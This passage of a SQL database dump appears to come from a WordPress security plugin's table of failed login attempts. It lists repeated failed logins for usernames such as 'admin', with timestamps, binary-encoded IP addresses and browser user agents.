Safari/537.36'),(5762,7909,1629481292.472146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5763,7910,1629481295.246664,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5764,7911,1629481297.020512,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5765,7914,1629481876.317680,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5766,7915,1629481942.150027,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5767,7916,1629482407.366589,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˖kM','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5768,7917,1629483004.249085,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6\'iX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5769,7918,1629483609.488715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���D�\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(5770,7919,1629483617.370493,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5771,7920,1629484174.474798,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���cN�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5772,7921,1629484307.002770,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(5773,7922,1629484817.014475,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�d�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5774,7922,1629484817.109319,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�d�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5775,7923,1629485259.699932,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5776,7924,1629485370.505434,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5777,7925,1629485944.209130,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[��O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5778,7926,1629486504.027568,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5779,7927,1629486909.919714,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�,&','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5780,7927,1629486909.965707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�,&','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5781,7928,1629487106.558532,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5782,7929,1629487681.784146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5783,7929,1629487681.819080,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5784,7930,1629488554.973814,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5785,7931,1629488876.935095,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֖Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5786,7932,1629489606.593236,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5787,7933,1629490168.962338,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5788,7934,1629490190.533160,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(5789,7935,1629490850.673820,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5790,7936,1629491151.098406,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5791,7937,1629491545.396473,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5792,7938,1629491801.892750,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(5793,7939,1629492246.578144,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5794,7940,1629492947.591939,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5795,7941,1629493207.019121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5796,7942,1629493208.331157,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5797,7943,1629493209.548845,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5798,7944,1629493210.853649,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5799,7945,1629493212.168288,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5800,7946,1629493213.735998,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5801,7947,1629493215.089738,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5802,7948,1629493216.419024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5803,7949,1629493217.776707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5804,7950,1629493219.231896,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5805,7951,1629493220.757568,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5806,7951,1629493220.774097,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5807,7952,1629493222.928123,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5808,7953,1629493224.929731,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5809,7954,1629493226.722118,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5810,7955,1629493228.114483,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5811,7956,1629493229.394623,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5812,7957,1629493230.821751,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5813,7958,1629493232.212807,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5814,7961,1629493420.928364,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%a��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(5815,7962,1629493717.433163,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5816,7963,1629494474.346320,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ȗ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5817,7964,1629494497.368731,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5818,7965,1629494505.180373,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5819,7966,1629494511.261326,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5820,7967,1629494518.469691,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5821,7968,1629494524.376080,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5822,7969,1629494530.020573,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5823,7970,1629494534.890661,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5824,7971,1629494540.064028,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5825,7972,1629494543.860534,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5826,7973,1629494546.127408,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5827,7974,1629494547.560147,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5828,7974,1629494547.580983,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5829,7975,1629494549.236010,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5830,7976,1629494550.583705,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5831,7977,1629494551.989787,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5832,7978,1629494553.328261,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5833,7979,1629494554.405827,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5834,7980,1629494556.087212,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5835,7981,1629494557.002058,1,'loginFailInvalidUsername','adlene',0,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5836,7983,1629495171.013026,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5837,7984,1629495250.038761,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5838,7985,1629495709.961405,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(5839,7986,1629496035.946934,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5840,7987,1629496266.754807,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5841,7988,1629496270.268656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5842,7988,1629496270.380747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5843,7989,1629496276.688629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5844,7990,1629496283.008568,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5845,7991,1629496291.068003,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5846,7991,1629496291.565669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5847,7992,1629496298.912576,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5848,7993,1629496305.365037,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5849,7994,1629496310.815348,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5850,7995,1629496319.679579,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5851,7995,1629496319.693229,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5852,7996,1629496331.635458,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5853,7997,1629496337.264232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5854,7997,1629496337.456502,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5855,7998,1629496342.734138,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5856,7999,1629496346.370736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5857,8000,1629496347.850246,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5858,8001,1629496351.279424,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5859,8004,1629496647.792440,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5860,8005,1629496872.254537,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5861,8006,1629497714.356283,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5862,8007,1629498531.941324,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5863,8035,1629499416.558262,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�$b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5864,8036,1629499867.732354,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���aZ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(5865,8037,1629500245.770356,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5866,8038,1629500430.050739,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5867,8039,1629500430.350940,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5868,8040,1629500430.715043,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5869,8041,1629500431.375144,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5870,8042,1629500431.812252,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5871,8043,1629500432.213021,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5872,8044,1629500432.603601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5873,8045,1629500432.916135,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5874,8046,1629500433.275572,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5875,8047,1629500433.668318,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5876,8048,1629500434.066702,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5877,8048,1629500434.105342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5878,8049,1629500434.496164,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 